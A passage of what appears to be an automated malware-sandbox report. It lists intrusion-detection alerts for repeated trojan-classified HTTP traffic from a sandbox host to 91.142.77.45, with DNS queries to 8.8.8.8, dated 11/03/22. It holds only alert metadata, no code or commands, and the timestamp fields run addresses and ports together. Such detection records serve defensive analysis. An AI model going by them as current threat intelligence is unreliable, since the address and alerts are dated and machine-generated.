                  SID:2025483
                  Source Port:80
                  Destination Port:49737
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549716802825766 11/03/22-12:30:32.992651
                  SID:2825766
                  Source Port:49716
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549722802825766 11/03/22-12:30:50.822444
                  SID:2825766
                  Source Port:49722
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549722802021641 11/03/22-12:30:50.822444
                  SID:2021641
                  Source Port:49722
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549740802024318 11/03/22-12:31:37.627027
                  SID:2024318
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497402025483 11/03/22-12:31:39.620076
                  SID:2025483
                  Source Port:80
                  Destination Port:49740
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.859082532014169 11/03/22-12:30:20.174105
                  SID:2014169
                  Source Port:59082
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.68.8.8.851530532014169 11/03/22-12:30:41.510499
                  SID:2014169
                  Source Port:51530
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549709802024313 11/03/22-12:30:16.075566
                  SID:2024313
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.860032532014169 11/03/22-12:31:29.125849
                  SID:2014169
                  Source Port:60032
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:91.142.77.45192.168.2.680497152025483 11/03/22-12:30:32.611167
                  SID:2025483
                  Source Port:80
                  Destination Port:49715
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549738802021641 11/03/22-12:31:33.019427
                  SID:2021641
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549715802024313 11/03/22-12:30:31.132672
                  SID:2024313
                  Source Port:49715
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497262025483 11/03/22-12:31:00.653288
                  SID:2025483
                  Source Port:80
                  Destination Port:49726
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549709802024318 11/03/22-12:30:16.075566
                  SID:2024318
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.858917532014169 11/03/22-12:31:03.812359
                  SID:2014169
                  Source Port:58917
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549718802024318 11/03/22-12:30:37.003049
                  SID:2024318
                  Source Port:49718
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549721802024313 11/03/22-12:30:48.032802
                  SID:2024313
                  Source Port:49721
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549729802825766 11/03/22-12:31:05.707382
                  SID:2825766
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549719802025381 11/03/22-12:30:42.564459
                  SID:2025381
                  Source Port:49719
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549721802024318 11/03/22-12:30:48.032802
                  SID:2024318
                  Source Port:49721
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549718802024313 11/03/22-12:30:37.003049
                  SID:2024313
                  Source Port:49718
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549714802825766 11/03/22-12:30:27.432237
                  SID:2825766
                  Source Port:49714
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549736802024313 11/03/22-12:31:29.221112
                  SID:2024313
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549732802825766 11/03/22-12:31:20.467945
                  SID:2825766
                  Source Port:49732
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549743802021641 11/03/22-12:31:43.782645
                  SID:2021641
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549740802025381 11/03/22-12:31:37.627027
                  SID:2025381
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549722802025381 11/03/22-12:30:50.822444
                  SID:2025381
                  Source Port:49722
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549742802825766 11/03/22-12:31:41.893270
                  SID:2825766
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549731802024318 11/03/22-12:31:09.511791
                  SID:2024318
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497432025483 11/03/22-12:31:45.271881
                  SID:2025483
                  Source Port:80
                  Destination Port:49743
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497452025483 11/03/22-12:31:52.163667
                  SID:2025483
                  Source Port:80
                  Destination Port:49745
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549731802024313 11/03/22-12:31:09.511791
                  SID:2024313
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497412025483 11/03/22-12:31:41.587643
                  SID:2025483
                  Source Port:80
                  Destination Port:49741
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549714802025381 11/03/22-12:30:27.432237
                  SID:2025381
                  Source Port:49714
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549713802024318 11/03/22-12:30:25.414440
                  SID:2024318
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549737802025381 11/03/22-12:31:31.046497
                  SID:2025381
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549709802025381 11/03/22-12:30:16.075566
                  SID:2025381
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549737802825766 11/03/22-12:31:31.046497
                  SID:2825766
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549736802024318 11/03/22-12:31:29.221112
                  SID:2024318
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549732802025381 11/03/22-12:31:20.467945
                  SID:2025381
                  Source Port:49732
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549719802825766 11/03/22-12:30:42.564459
                  SID:2825766
                  Source Port:49719
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.863229532014169 11/03/22-12:30:32.906943
                  SID:2014169
                  Source Port:63229
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549741802024318 11/03/22-12:31:39.946873
                  SID:2024318
                  Source Port:49741
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549744802024318 11/03/22-12:31:45.577786
                  SID:2024318
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.849786532014169 11/03/22-12:30:06.615613
                  SID:2014169
                  Source Port:49786
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549730802025381 11/03/22-12:31:07.626823
                  SID:2025381
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549744802024313 11/03/22-12:31:45.577786
                  SID:2024313
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549738802024318 11/03/22-12:31:33.019427
                  SID:2024318
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549727802025381 11/03/22-12:31:01.987085
                  SID:2025381
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.856123532014169 11/03/22-12:31:32.930668
                  SID:2014169
                  Source Port:56123
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549724802025381 11/03/22-12:30:54.913991
                  SID:2025381
                  Source Port:49724
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549741802024313 11/03/22-12:31:39.946873
                  SID:2024313
                  Source Port:49741
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549716802024313 11/03/22-12:30:32.992651
                  SID:2024313
                  Source Port:49716
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549713802021641 11/03/22-12:30:25.414440
                  SID:2021641
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549723802021641 11/03/22-12:30:53.367985
                  SID:2021641
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549707802021641 11/03/22-12:30:11.977904
                  SID:2021641
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549712802825766 11/03/22-12:30:22.162497
                  SID:2825766
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549711802024318 11/03/22-12:30:20.264286
                  SID:2024318
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549709802825766 11/03/22-12:30:16.075566
                  SID:2825766
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549728802021641 11/03/22-12:31:03.903902
                  SID:2021641
                  Source Port:49728
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549711802024313 11/03/22-12:30:20.264286
                  SID:2024313
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549706802825766 11/03/22-12:30:09.785093
                  SID:2825766
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549708802024313 11/03/22-12:30:14.035064
                  SID:2024313
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549729802025381 11/03/22-12:31:05.707382
                  SID:2025381
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549708802024318 11/03/22-12:30:14.035064
                  SID:2024318
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497172025483 11/03/22-12:30:36.516442
                  SID:2025483
                  Source Port:80
                  Destination Port:49717
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549716802024318 11/03/22-12:30:32.992651
                  SID:2024318
                  Source Port:49716
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549739802825766 11/03/22-12:31:35.606377
                  SID:2825766
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.865044532014169 11/03/22-12:31:27.427876
                  SID:2014169
                  Source Port:65044
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549745802021641 11/03/22-12:31:50.569101
                  SID:2021641
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549745802825766 11/03/22-12:31:50.569101
                  SID:2825766
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549734802825766 11/03/22-12:31:25.377976
                  SID:2825766
                  Source Port:49734
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549710802021641 11/03/22-12:30:18.297577
                  SID:2021641
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497132025483 11/03/22-12:30:26.998667
                  SID:2025483
                  Source Port:80
                  Destination Port:49713
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549740802825766 11/03/22-12:31:37.627027
                  SID:2825766
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549733802024313 11/03/22-12:31:22.614964
                  SID:2024313
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549738802024313 11/03/22-12:31:33.019427
                  SID:2024313
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549715802021641 11/03/22-12:30:31.132672
                  SID:2021641
                  Source Port:49715
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.856086532014169 11/03/22-12:30:57.832797
                  SID:2014169
                  Source Port:56086
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549733802024318 11/03/22-12:31:22.614964
                  SID:2024318
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497282025483 11/03/22-12:31:05.359036
                  SID:2025483
                  Source Port:80
                  Destination Port:49728
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497202025483 11/03/22-12:30:47.547245
                  SID:2025483
                  Source Port:80
                  Destination Port:49720
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497242025483 11/03/22-12:30:57.636605
                  SID:2025483
                  Source Port:80
                  Destination Port:49724
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549735802025381 11/03/22-12:31:27.516452
                  SID:2025381
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549727802021641 11/03/22-12:31:01.987085
                  SID:2021641
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549720802825766 11/03/22-12:30:45.793165
                  SID:2825766
                  Source Port:49720
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.854903532014169 11/03/22-12:30:36.914690
                  SID:2014169
                  Source Port:54903
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549718802021641 11/03/22-12:30:37.003049
                  SID:2021641
                  Source Port:49718
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549739802024313 11/03/22-12:31:35.606377
                  SID:2024313
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549736802021641 11/03/22-12:31:29.221112
                  SID:2021641
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549739802024318 11/03/22-12:31:35.606377
                  SID:2024318
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549717802825766 11/03/22-12:30:35.019960
                  SID:2825766
                  Source Port:49717
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549725802025381 11/03/22-12:30:57.918358
                  SID:2025381
                  Source Port:49725
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.856547532014169 11/03/22-12:30:59.560048
                  SID:2014169
                  Source Port:56547
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549734802025381 11/03/22-12:31:25.377976
                  SID:2025381
                  Source Port:49734
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549716802025381 11/03/22-12:30:32.992651
                  SID:2025381
                  Source Port:49716
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.859504532014169 11/03/22-12:30:22.044585
                  SID:2014169
                  Source Port:59504
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:91.142.77.45192.168.2.680497272025483 11/03/22-12:31:03.547635
                  SID:2025483
                  Source Port:80
                  Destination Port:49727
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497362025483 11/03/22-12:31:30.738262
                  SID:2025483
                  Source Port:80
                  Destination Port:49736
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497382025483 11/03/22-12:31:35.287070
                  SID:2025483
                  Source Port:80
                  Destination Port:49738
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549717802021641 11/03/22-12:30:35.019960
                  SID:2021641
                  Source Port:49717
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549736802825766 11/03/22-12:31:29.221112
                  SID:2825766
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549743802025381 11/03/22-12:31:43.782645
                  SID:2025381
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.852556532014169 11/03/22-12:30:47.939957
                  SID:2014169
                  Source Port:52556
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549723802024313 11/03/22-12:30:53.367985
                  SID:2024313
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549715802025381 11/03/22-12:30:31.132672
                  SID:2025381
                  Source Port:49715
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549708802825766 11/03/22-12:30:14.035064
                  SID:2825766
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549742802024313 11/03/22-12:31:41.893270
                  SID:2024313
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549744802025381 11/03/22-12:31:45.577786
                  SID:2025381
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549729802024318 11/03/22-12:31:05.707382
                  SID:2024318
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497302025483 11/03/22-12:31:09.196542
                  SID:2025483
                  Source Port:80
                  Destination Port:49730
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549742802024318 11/03/22-12:31:41.893270
                  SID:2024318
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549729802024313 11/03/22-12:31:05.707382
                  SID:2024313
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549730802021641 11/03/22-12:31:07.626823
                  SID:2021641
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549743802825766 11/03/22-12:31:43.782645
                  SID:2825766
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497252025483 11/03/22-12:30:59.345748
                  SID:2025483
                  Source Port:80
                  Destination Port:49725
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549707802024312 11/03/22-12:30:11.977904
                  SID:2024312
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549732802024318 11/03/22-12:31:20.467945
                  SID:2024318
                  Source Port:49732
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.862520532014169 11/03/22-12:31:07.541345
                  SID:2014169
                  Source Port:62520
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.68.8.8.857322532014169 11/03/22-12:31:39.862228
                  SID:2014169
                  Source Port:57322
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549707802024317 11/03/22-12:30:11.977904
                  SID:2024317
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549732802024313 11/03/22-12:31:20.467945
                  SID:2024313
                  Source Port:49732
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549713802024313 11/03/22-12:30:25.414440
                  SID:2024313
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549726802024318 11/03/22-12:30:59.657451
                  SID:2024318
                  Source Port:49726
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549724802825766 11/03/22-12:30:54.913991
                  SID:2825766
                  Source Port:49724
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549727802825766 11/03/22-12:31:01.987085
                  SID:2825766
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549720802021641 11/03/22-12:30:45.793165
                  SID:2021641
                  Source Port:49720
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549718802825766 11/03/22-12:30:37.003049
                  SID:2825766
                  Source Port:49718
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549723802024318 11/03/22-12:30:53.367985
                  SID:2024318
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549711802021641 11/03/22-12:30:20.264286
                  SID:2021641
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549730802825766 11/03/22-12:31:07.626823
                  SID:2825766
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497442025483 11/03/22-12:31:47.249314
                  SID:2025483
                  Source Port:80
                  Destination Port:49744
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549708802021641 11/03/22-12:30:14.035064
                  SID:2021641
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497192025483 11/03/22-12:30:45.376826
                  SID:2025483
                  Source Port:80
                  Destination Port:49719
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497082025483 11/03/22-12:30:15.684954
                  SID:2025483
                  Source Port:80
                  Destination Port:49708
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497332025483 11/03/22-12:31:25.021802
                  SID:2025483
                  Source Port:80
                  Destination Port:49733
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549733802825766 11/03/22-12:31:22.614964
                  SID:2825766
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549714802021641 11/03/22-12:30:27.432237
                  SID:2021641
                  Source Port:49714
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549726802024313 11/03/22-12:30:59.657451
                  SID:2024313
                  Source Port:49726
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497112025483 11/03/22-12:30:21.541561
                  SID:2025483
                  Source Port:80
                  Destination Port:49711
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.852079532014169 11/03/22-12:31:11.161882
                  SID:2014169
                  Source Port:52079
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549710802024313 11/03/22-12:30:18.297577
                  SID:2024313
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549712802025381 11/03/22-12:30:22.162497
                  SID:2025381
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549710802024318 11/03/22-12:30:18.297577
                  SID:2024318
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549745802024318 11/03/22-12:31:50.569101
                  SID:2024318
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.861833532014169 11/03/22-12:31:25.278309
                  SID:2014169
                  Source Port:61833
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549733802021641 11/03/22-12:31:22.614964
                  SID:2021641
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549706802025381 11/03/22-12:30:09.785093
                  SID:2025381
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549711802825766 11/03/22-12:30:20.264286
                  SID:2825766
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497222025483 11/03/22-12:30:53.023996
